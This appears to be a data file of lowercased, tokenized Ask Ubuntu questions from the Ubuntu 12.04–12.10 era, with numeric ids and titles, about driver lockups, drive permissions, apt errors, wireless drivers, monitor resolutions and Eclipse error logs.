222294	nvidia-173 12.04 lockup	i see strange lockups on a fairly new install of ubuntu 12.04.01 lts , possibly due to the video card . i have an nvidia geforce fx 5500 in an hp proliant ml350 g6 . with lightdm , if i click around on the login box to select the type of graphics session ( unity , gnome classic , etc . ) , the machine `` locks up '' , defined as the screen going black and getting no signal ( monitor immediately goes to sleep ) , then the machine gradually bogging down ( i can log in via ssh but things get slower and slower until i have to reboot ) . i tried switching to gdm as the display manager , and i get the same sort of crash but not in such a reproducible way . i have nvidia-173 and nvidia-173-updates installed . i can provide log file info if someone tells me which file to look into . thanks for any help .
222295	permissions on mounted drive not able to be changed	so i have 4 2tb drives mounted as /media/media1 , /media/media2 , /media/media3 , /media/media4 . /media i have changed permissions on to 775 root root 4096 , but it will not let me change it on any of my 4 drives . the permissions on them are 777 root root 4096 . i am wanting to change all four drives to 775 permissions . any help would be greatly appreciated as this is driving me insane .
222305	can not launch software centre , neither update	m @ samsung : ~ $ sudo rm /var/lib/apt/lists/* -vf [ sudo ] password for m : rm : can not remove `/var/lib/apt/lists/partial ' : is a directory m @ samsung : ~ $ sudo apt-get update n : ignoring file 'gnomebaker.lis ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension e : malformed line 1 in source list /etc/apt/sources.list.d/gnomebaker.list ( uri parse ) e : the list of sources could not be read . m @ samsung : ~ $
222307	how can i get boot menu up to install on mini 9 from flash	i am starting to install 12.10 from a usb on my mini 9 . instructions say to hit f12 to bring up the boot menu but the mini 9 does not have an f12 . anyone know how i can get the boot menu up to start this ?
222311	is it possible to extend a ubuntu 12.04 disk in vmware ?	i am trying to extend the disk on a ubuntu server running as a vmware esxi guest . i have extended the disk in the settings of the guest in esx . how do i go about extending the disk to allow more free space for the os/user data ? i have been searching for the answer on this and have read many posts , but none seem to address my actual needs . i am pretty new to linux/ubuntu but am catching on , so please dont beat me up too badly here . thanks .
222315	set mplayer as default application	i just did a fresh install of 12.10 and are now left wondering how to set mplayer as a global default application for video . i created a mplayer.desktop and added the same categories as totem has , however still no luck selecting it from the detailed settings . a similar problem is with thunderbird , which id like to set as default calendar app . however i can only select gedit , for whatever reasons . any help would be very much appreciated ! thanks
222317	remove '500 gb hard disk'-symbol in computer : /// ( nautilus )	at the location computer : /// in nautilus i have a needless symbol '500 gb hard disk ' how can i remove it ? it 's like this problem : http : //forums.linuxmint.com/viewtopic.php ? f=47 & t=117655 thank you
222322	problem with cuda-5.0 under unbuntu 12.10	i 'm trying to install cuds-5.0 on the new ubuntu 12.10 server . but i have some errors for that . when i try to make the makefile in sample code . it told me * '' nvcc fatal : unsupported gpu architecture 'compute_35 ' '' * command and output is as following . shi @ dodo : ~/nvidia_cuda-5.0_samples $ **nvcc -v** nvcc : nvidia ( r ) cuda compiler driver copyright ( c ) 2005-2012 nvidia corporation built on thu_apr__5_00:24:31_pdt_2012 cuda compilation tools , release 4.2 , v0.2.1221 output : shi @ dodo : ~ $ **cat /proc/driver/nvidia/version** nvrm version : nvidia unix x86_64 kernel module 304.54 sat sep 29 00:05:49 pdt 2012 gcc version : gcc version 4.4.7 ( ubuntu/linaro 4.4.7-2ubuntu1 )
222323	how to get mac mini 3,1 ubuntu 12.10 hooked up to internet ? compiling 802.11 linux sta driver	i just managed to get ubuntu 12.10 installed ( could n't get 12.04 lts to work ) on my mac mini 3,1 ( early 2009 ) but it 's not able to connect to the internet . mac mini 3,1 instructions at the mactel ubuntu help pages say that for the the wireless/airport to work : you should use the restricted driver , install from : system - > administration - > hardware drivers ( if not shown there , install package broadcom-sta ) . select the broadcom sta driver you want and activate . i do n't know what that means . in the `` system settings '' and `` dash home '' there 's nothing like `` administration '' or `` hardware drivers '' despite much searching . googling `` broadcom sta driver '' lead me to the 802.11 linux sta driver page whose readme page notes optimistically : some distros ( ubuntu and fedora at the least ) already have a version of this driver in their repositories precompiled , tested and ready to go . you just use the package manager to install the proper package . later it suggests : on ubuntu , you will need headers and tools . try these commands : # apt-get install build-essential linux-headers-generic # apt-get build-dep linux doing both leads to error messages $ sudo apt-get install build-essential linux-headers-generic [ sudo ] password for ungerb : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package build-essential $ sudo apt-get build-dep linux [ sudo ] password for ungerb : reading package lists ... done building dependency tree reading state information ... done e : you must put some 'source ' uris in your sources.list it then adds : to check to see if you have this directory do this : # ls /lib/modules/`uname -r`/build when i type that in i get a nice list of directories but i 'm not really sure what i 'm looking for . the readme continues with some build instructions noting : example : # mkdir hybrid_wl # cd hybrid_wl # tar xzf /hybrid-portsrc.tar or /hybrid-portsrc-x86_64.tar.gz i could enter those commands but am not sure what path i should use . if you 've followed along this far , may the lord bless you and keep you . my questions are : 1 ) what do those error messages mean and how do i fix them ? 2 ) in what directory ( path ) should i put the driver . 3 ) is there an easier way with system settings or home dash to get my wireless working without using the terminal ? edit : typing in $ lspci -nn produces : . . . 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 05 ) . . . thanks a million in advance !
222325	how to `` un-automount '' external harddrive ?	so i dualboot 12.10 and win7 . both oss are on the primary ssd while all commonly used data ( documents , movies , music , profiles etc ) is on a secondary ntfs-formatted hdd . since i needed the ntfs drive to automatically mount in ubuntu right at startup , i downloaded ntfs-config and set it to automount my ntfs drive . problem is , i also accidentally told it to automount my external hard drive ( which is also ntfs formatted ) . when booting up ubuntu , it now checks for the presence of that drive every single time , which is getting annoying 'cause i do n't always have it connected . i 've tried un- and reinstalling ntfs-config , telling it to not automount the external hd , but to no avail . any suggestions ?
222326	which folders to include in backup ?	i 'm quite new to ubuntu and want to create a backup . i 'm really not sure what files and folders to include so that if i restore my system it will be as it is now . i ca n't seem to find good details of this anywhere . hopefully someone could help me with this . is it possible to backup everything as it is now so in the event of a system restore i do n't have to reinstall programs and settings ? thanks , jason
222327	why does n't skype theme match my desktop environment theme ?	i 've got ubuntu 12.10 installed on my pc . after enabling the partner sources , installing skype , rebooting my pc and starting skype , i notice visual differences between my desktop theme and skype theme . my theme is the default ambience theme . anyone got any clues ?
222328	attempting to install netgear n300 wireless usb adapter on ubuntu without a present internet connection	hello linux/ubuntu world out there . i do n't have internet presently on the desktop i am trying to install the usb wireless adapter on . this seems to be the problem , which if the hardware would work would theoretically fix the problem . i can not access the internet via anything but wireless . i am presently on my laptop searching for answers while trying to install this little device . so any advice will have to take that into account . now i have tried so far , using wine which does not want to work , i have tried windows wireless drivers which does n't want to work , i have tried software sources , other software and it will not acknowledge the cdrom as a repository stating errors like e : unable to stat the mount point /cdrom/ -stat ( 2 : no such file or directory ) however i can open the cd icon on my computer and access and browse the files . the computer can read the cd . i can read the cd . i 've tried just plugging it in and seeing if the computer will automatically recognize the hardware , and go from there . that does not work either . i have tested usb port to just verify that the usb port works . it does . my laptop recognizes the hardware , and would easily install the software if i prompted it to . the difference is that my laptop is vista , and i hate vista . any tips , tricks ? edit command lsusb : bus 008-004 with various ids linux foundation 1.1 root hub ( basically recognizing my mouse , keyboard , and the netgear is connected ) and then for the command arch : i get i686 what does this stuff mean ? i know the equipment is not bad , i just do n't know how to make them communicate with each other . second edit : this is what the package says : n300 wna3100 , this is what the terminal says : bus 002 device 002 : id 0846 : 9020 netgear , inc. that is all it says . there is nothing following after that .
222338	ubuntu 12.04 + eclipse 64 bits key binding error	the text is quite extense so , this is just a part of it : ! session 2012-11-23 10:15:52.442 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20120608-1200 java.version=1.7.0_09 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.jface 2 0 2012-11-23 10:16:06.408 ! message keybinding conflicts occurred . they may interfere with normal accelerator operation . ! subentry 1 org.eclipse.jface 2 0 2012-11-23 10:16:06.408 ! message a conflict occurred for alt+shift+r : binding ( alt+shift+r , parameterizedcommand ( command ( oracle.eclipse.tools.common.services.ui.refactor.rename.command , rename , rename the selected text. , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , oracle.eclipse.tools.common.services.ui.refactor.internal.artifactrefactoringcommandhandler , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) binding ( alt+shift+r , parameterizedcommand ( command ( org.eclipse.jdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) ! entry org.eclipse.ui.workbench 4 0 2012-11-23 10:16:10.409 ! message an unexpected exception was thrown . ! stack 0 java.lang.nullpointerexception at org.eclipse.ui.internal.workbenchwindow.puttoolbarlabel ( workbenchwindow.java:1697 ) at org.eclipse.ui.internal.menus.menuadditioncacheentry.createtoolbaradditioncontribution ( menuadditioncacheentry.java:208 ) at org.eclipse.ui.internal.menus.menuadditioncacheentry.createcontributionitems ( menuadditioncacheentry.java:177 ) at org.eclipse.ui.internal.menus.trimcontributionmanager.update ( trimcontributionmanager.java:224 ) at org.eclipse.ui.internal.workbenchwindow.updatelayoutdataforcontents ( workbenchwindow.java:3874 ) at org.eclipse.ui.internal.workbenchwindow.setcoolbarvisible ( workbenchwindow.java:3675 ) at org.eclipse.ui.internal.viewintroadapterpart.setbarvisibility ( viewintroadapterpart.java:203 ) at org.eclipse.ui.internal.viewintroadapterpart.dispose ( viewintroadapterpart.java:106 ) at org.eclipse.ui.internal.workbenchpartreference.dodisposepart ( workbenchpartreference.java:737 ) at org.eclipse.ui.internal.viewreference.dodisposepart ( viewreference.java:107 ) at org.eclipse.ui.internal.workbenchpartreference.dispose ( workbenchpartreference.java:684 ) at org.eclipse.ui.internal.workbenchpage.disposepart ( workbenchpage.java:1801 ) at org.eclipse.ui.internal.workbenchpage.partremoved ( workbenchpage.java:1793 ) at org.eclipse.ui.internal.viewfactory.releaseview ( viewfactory.java:257 ) at org.eclipse.ui.internal.perspective.dispose ( perspective.java:292 ) at org.eclipse.ui.internal.workbenchpage.dispose ( workbenchpage.java:1872 ) at org.eclipse.ui.internal.workbenchwindow.closeallpages ( workbenchwindow.java:894 ) at org.eclipse.ui.internal.workbenchwindow.hardclose ( workbenchwindow.java:1729 ) at org.eclipse.ui.internal.workbenchwindow.busyclose ( workbenchwindow.java:730 ) at org.eclipse.ui.internal.workbenchwindow.access $ 0 ( workbenchwindow.java:715 ) at org.eclipse.ui.internal.workbenchwindow $ 6.run ( workbenchwindow.java:867 ) at org.eclipse.swt.custom.busyindicator.showwhile ( busyindicator.java:70 ) at org.eclipse.ui.internal.workbenchwindow.close ( workbenchwindow.java:865 ) at org.eclipse.jface.window.windowmanager.close ( windowmanager.java:109 ) at org.eclipse.ui.internal.workbench $ 18.run ( workbench.java:1114 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.ui.internal.workbench.busyclose ( workbench.java:1111 ) at org.eclipse.ui.internal.workbench.access $ 15 ( workbench.java:1040 ) at org.eclipse.ui.internal.workbench $ 25.run ( workbench.java:1284 ) at org.eclipse.swt.custom.busyindicator.showwhile ( busyindicator.java:70 ) at org.eclipse.ui.internal.workbench.close ( workbench.java:1282 ) at org.eclipse.ui.internal.workbench.close ( workbench.java:1254 ) at org.eclipse.ui.internal.workbenchwindow.busyclose ( workbenchwindow.java:727 ) at org.eclipse.ui.internal.workbenchwindow.access $ 0 ( workbenchwindow.java:715 ) at org.eclipse.ui.internal.workbenchwindow $ 6.run ( workbenchwindow.java:867 ) at org.eclipse.swt.custom.busyindicator.showwhile ( busyindicator.java:70 ) at org.eclipse.ui.internal.workbenchwindow.close ( workbenchwindow.java:865 ) at org.eclipse.jface.window.window.handleshellcloseevent ( window.java:741 ) at org.eclipse.jface.window.window $ 3.shellclosed ( window.java:687 ) at org.eclipse.swt.widgets.typedlistener.handleevent ( typedlistener.java:98 ) at org.eclipse.swt.widgets.eventtable.sendevent ( eventtable.java:84 ) at org.eclipse.swt.widgets.widget.sendevent ( widget.java:1276 ) at org.eclipse.swt.widgets.widget.sendevent ( widget.java:1300 ) at org.eclipse.swt.widgets.widget.sendevent ( widget.java:1285 ) at org.eclipse.swt.widgets.shell.closewidget ( shell.java:617 ) at org.eclipse.swt.widgets.shell.gtk_delete_event ( shell.java:1191 ) at org.eclipse.swt.widgets.widget.windowproc ( widget.java:1750 ) at org.eclipse.swt.widgets.control.windowproc ( control.java:5116 ) at org.eclipse.swt.widgets.display.windowproc ( display.java:4369 ) at org.eclipse.swt.internal.gtk.os._gtk_main_do_event ( native method ) at org.eclipse.swt.internal.gtk.os.gtk_main_do_event ( os.java:8295 ) at org.eclipse.swt.widgets.display.eventproc ( display.java:1192 ) at org.eclipse.swt.internal.gtk.os._g_main_context_iteration ( native method ) at org.eclipse.swt.internal.gtk.os.g_main_context_iteration ( os.java:2332 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3177 ) at org.eclipse.ui.internal.workbench.runeventloop ( workbench.java:2701 ) at org.eclipse.ui.internal.workbench.runui ( workbench.java:2665 ) at org.eclipse.ui.internal.workbench.access $ 4 ( workbench.java:2499 ) at org.eclipse.ui.internal.workbench $ 7.run ( workbench.java:679 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:668 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:149 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:353 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:180 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:629 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:584 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) at org.eclipse.equinox.launcher.main.main ( main.java:1414 ) ! session 2012-11-23 10:36:07.863 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20120608-1200 java.version=1.7.0_09 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.jface 2 0 2012-11-23 10:36:13.181 ! message keybinding conflicts occurred . they may interfere with normal accelerator operation . ! subentry 1 org.eclipse.jface 2 0 2012-11-23 10:36:13.181 ! message a conflict occurred for alt+shift+r : binding ( alt+shift+r , parameterizedcommand ( command ( oracle.eclipse.tools.common.services.ui.refactor.rename.command , rename , rename the selected text. , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , oracle.eclipse.tools.common.services.ui.refactor.internal.artifactrefactoringcommandhandler , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) binding ( alt+shift+r , parameterizedcommand ( command ( org.eclipse.jdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) ! entry org.eclipse.osgi 2 1 2012-11-23 10:39:04.681 ! message nls unused message : cachemanager_cannotloadnonurllocation in : org.eclipse.equinox.internal.p2.repository.messages ! session 2012-11-23 15:14:12.933 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20120608-1200 java.version=1.7.0_09 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.jface 2 0 2012-11-23 15:14:23.380 ! message keybinding conflicts occurred . they may interfere with normal accelerator operation . ! subentry 1 org.eclipse.jface 2 0 2012-11-23 15:14:23.380 ! message a conflict occurred for alt+shift+r : binding ( alt+shift+r , parameterizedcommand ( command ( oracle.eclipse.tools.common.services.ui.refactor.rename.command , rename , rename the selected text. , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , oracle.eclipse.tools.common.services.ui.refactor.internal.artifactrefactoringcommandhandler , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) binding ( alt+shift+r , parameterizedcommand ( command ( org.eclipse.jdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) ! entry org.springframework.ide.eclipse.uaa 4 2 2012-11-23 15:14:32.800 ! message problems occurred when invoking code from plug-in : `` org.springframework.ide.eclipse.uaa '' . ! stack 0 java.lang.nullpointerexception at org.springframework.ide.eclipse.internal.uaa.monitor.commandusagemonitor.startmonitoring ( commandusagemonitor.java:61 ) at org.springframework.ide.eclipse.uaa.uaaplugin $ 1 $ 1.run ( uaaplugin.java:91 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.springframework.ide.eclipse.uaa.uaaplugin $ 1.run ( uaaplugin.java:85 ) at org.eclipse.core.internal.jobs.worker.run ( worker.java:54 ) ! session 2012-11-23 15:15:21.833 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20120608-1200 java.version=1.7.0_09 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.jface 2 0 2012-11-23 15:15:27.283 ! message keybinding conflicts occurred . they may interfere with normal accelerator operation . ! subentry 1 org.eclipse.jface 2 0 2012-11-23 15:15:27.283 ! message a conflict occurred for alt+shift+r : binding ( alt+shift+r , parameterizedcommand ( command ( oracle.eclipse.tools.common.services.ui.refactor.rename.command , rename , rename the selected text. , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , oracle.eclipse.tools.common.services.ui.refactor.internal.artifactrefactoringcommandhandler , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) binding ( alt+shift+r , parameterizedcommand ( command ( org.eclipse.jdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.defaultacceleratorconfiguration , org.eclipse.ui.contexts.window , , , system ) ! entry org.eclipse.jface 2 0 2012-11-23 15:18:41.265 ! message keybinding conflicts occurred . they may interfere with normal accelerator operation . ! subentry 1 org.eclipse.jface 2 0 2012-11-23 15:18:41.265 ! message a conflict occurred for alt+shift+e : binding ( alt+shift+e , parameterizedcommand ( command ( oracle.eclipse.tools.common.services.ui.refactor.rename.command , rename , rename the selected text. , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , oracle.eclipse.tools.common.services.ui.refactor.internal.artifactrefactoringcommandhandler , , ,true ) , null ) , org.eclipse.ui.emacsacceleratorconfiguration , org.eclipse.ui.contexts.window , , , user ) binding ( alt+shift+e , parameterizedcommand ( command ( org.eclipse.jdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.emacsacceleratorconfiguration , org.eclipse.ui.contexts.window , , , user ) binding ( alt+shift+e , parameterizedcommand ( command ( org.eclipse.wst.jsdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.wst.jsdt.ui.category.refactoring , refactor - javascript , javascript refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.emacsacceleratorconfiguration , org.eclipse.ui.contexts.window , , , user ) ! session 2012-11-23 15:18:56.267 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20120608-1200 java.version=1.7.0_09 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.jface 2 0 2012-11-23 15:19:01.605 ! message keybinding conflicts occurred . they may interfere with normal accelerator operation . ! subentry 1 org.eclipse.jface 2 0 2012-11-23 15:19:01.605 ! message a conflict occurred for alt+shift+e : binding ( alt+shift+e , parameterizedcommand ( command ( org.eclipse.wst.jsdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.wst.jsdt.ui.category.refactoring , refactor - javascript , javascript refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.emacsacceleratorconfiguration , org.eclipse.ui.contexts.window , , , user ) binding ( alt+shift+e , parameterizedcommand ( command ( org.eclipse.jdt.ui.edit.text.java.rename.element , rename - refactoring , rename the selected element , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , , , ,true ) , null ) , org.eclipse.ui.emacsacceleratorconfiguration , org.eclipse.ui.contexts.window , , , user ) binding ( alt+shift+e , parameterizedcommand ( command ( oracle.eclipse.tools.common.services.ui.refactor.rename.command , rename , rename the selected text. , category ( org.eclipse.jdt.ui.category.refactoring , refactor - java , java refactoring actions , true ) , oracle.eclipse.tools.common.services.ui.refactor.internal.artifactrefactoringcommandhandler , , ,true ) , null ) , org.eclipse.ui.emacsacceleratorconfiguration , org.eclipse.ui.contexts.window , , , user )
222342	how do i remove amazon app but keep google apps ?	i 'm using ubuntu 12.10 . whenever i go to an amazon webpage it keeps popping up an 'amazon app ' in my unity taskbar . i find this relatively useless because i 'm already on the amazon website . i uninstalled it but it ended up uninstalling all my google and other apps as well . when i tried reinstalling the gmail app , it also reinstalled the amazon app ! is there a way to separate amazon from the other apps ?
222345	is there a file explorer/manager for the command line ?	i would like to know if there is something like dos interface for ubuntu . i mean a `` gui '' that can run from the console ( for example if you are using ubuntu server ) . some file explorer like nautilus but in console .
222348	what does `` sudo apt-get update '' do ?	i am wondering what sudo apt-get update does ? what does it update ?
222360	is `` mate '' an available desktop environment on ubuntu 12.10 and 12.04 and attractive as on the linuxmint 14 ?	i am wondering if mate can be installed on ubuntu 12.10 and 12.04 without any glitches and bugs ? i have tried it using linuxmint and it is fairly attractive there and stable too , but i 'd like to stick to ubuntu . thanks .
222361	how to add shell script to my linux system	i have shell script for monitoring local area traffic for my system . now i want to install it , and want to run like other unix command
222375	monitor blinks with certain programs	my computer is a hp dv6 with 8gb ram , 500gb hdd and a amd radeon hd 6480 graphics card and dual core cpu . now here is my problem : when i try to run some programs such as gucvie and xbmc , the screen blinks on and off every few . i have tried using both the opensource & proprietary drivers for my graphics card . running these programs in terminal displays no errors . any clues here ?
222376	how can i extract the deb files from the ubuntu iso ?	how can i extract the deb files of ubuntu 12.10 from the official iso , i am trying to cut the download time , only some packages are in /pool/main the rest seem to be in a virtual fs in /casper/ . how can i extract the deb files ?
222380	why does penguin.local point to an odd ip , when it is meant to be local ?	so i was doing some configuration for ssh . when i later then did this command : lsof -i tcp|grep ^ssh i got a list of what i was expecting to happen . however , something i never noticed before was that everything was being called `` penguin.local '' as my machine . this is n't odd , because i know i named my laptop as `` penguin '' and usually `` .local '' gets appended in ubuntu from past experience . the odd part is , why is it resolving to this ip address `` 5.16.138.166 '' ? surely it should say `` 127.0.0.1 '' , like localhost , local , etc ... can anyone help me ? here 's some commands i 've ran if it might help : $ traceroute penguin.local traceroute to penguin.local ( 5.16.138.166 ) , 30 hops max , 60 byte packets 1 penguin.local ( 5.16.138.166 ) 0.035 ms 0.010 ms 0.009 ms $ ping penguin.local ping penguin.local ( 5.16.138.166 ) 56 ( 84 ) bytes of data . 64 bytes from penguin.local ( 5.16.138.166 ) : icmp_req=1 ttl=64 time=0.040 ms 64 bytes from penguin.local ( 5.16.138.166 ) : icmp_req=2 ttl=64 time=0.053 ms 64 bytes from penguin.local ( 5.16.138.166 ) : icmp_req=3 ttl=64 time=0.054 ms 64 bytes from penguin.local ( 5.16.138.166 ) : icmp_req=4 ttl=64 time=0.054 ms ^c -- - penguin.local ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3004ms rtt min/avg/max/mdev = 0.040/0.050/0.054/0.007 ms $ ping 127.0.0.1 ping 127.0.0.1 ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 127.0.0.1 : icmp_req=1 ttl=64 time=0.056 ms 64 bytes from 127.0.0.1 : icmp_req=2 ttl=64 time=0.051 ms 64 bytes from 127.0.0.1 : icmp_req=3 ttl=64 time=0.050 ms 64 bytes from 127.0.0.1 : icmp_req=4 ttl=64 time=0.057 ms ^c -- - 127.0.0.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2997ms rtt min/avg/max/mdev = 0.050/0.053/0.057/0.007 ms whois resolves to an address in `` st.petersburg '' for some reason ... yet from what i can see its a local address based on my tests .
222382	.bashrc not run when ssh-ing in as a user who has home dir encryption	if i ssh into an ubuntu 12.04.1 lts server as a user with home dir encryption , i get a really plain shell ( no default .bashrc run ) . if i log in via console ( of course causing the home directory to be decrypted ) and then ssh in while logged into the console , the .bashrc script will have been run and the ssh experience will be normal ... i 've solved the problem of authorized_keys being encrypted during login attempts , but how do i now solve this problem ?
222383	ubuntu 12.10 automatic logout	i just had a new desktop constructed and installed ubuntu 12.10 which was successful for the most part but every time i open up some applications like thunderbird i get automatically logged out and all my windows are closed . system error messages also come up from time to time . also i 'm not sure if this helps but if i select the `` use system title bar and borders '' in chromium i will also get logged out and from that point wo n't be able to use it without getting logged out in the future . if i click on particular links as well . if anyone has any tips on how i can isolate and fix the problem i would greatly appreciate it .
222386	detect correct resolution dual monitor vga 9800gt ubuntu 12.10	i connected a second monitor to my 9800gt on the vga port . the first monitor is on dvi . both monitors have a native resolution of 1920x1080 but the second monitor does n't get past 1360x768 and appears as `` unknown '' in the display settings . i tried this guide on how to add undetected resolutions but it did n't work . first i create the new mode with xrand -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync and then when i try to add the new mode to my second monitor like randr -- addmode vga-0 1920x1080 i get this error : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 i tried using the nvidia-settings panel to generate a xorg.conf : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-1 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9800 gt '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` crt : 1360x768 +0+0 , dfp : nvidia-auto-select +1360+0 ; crt : nvidia-auto-select @ 1920x1080 +0+0 , dfp : nvidia-auto-select +1360+0 '' ____^____ i tried changing this to 1920x1080 but no luck subsection `` display '' depth 24 endsubsection endsection here 's my xrandr output in case it helps : screen 0 : minimum 8 x 8 , current 3280 x 1080 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected 1360x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0* 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 dvi-i-1 connected 1920x1080+1360+0 ( normal left inverted right x axis y axis ) 510mm x 290mm 1920x1080 60.0*+ 50.0 1680x1050 60.0 1600x1200 60.0 1440x900 59.9 1280x1024 60.0 1280x960 60.0 1280x800 59.8 1280x720 60.0 50.0 1024x768 60.0 800x600 60.3 56.2 720x576 50.0 720x480 59.9 640x480 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) any ideas on what to do next ? i 've been trying for hours with no luck , it works fine in windows so it ca n't be the cable or monitor ...
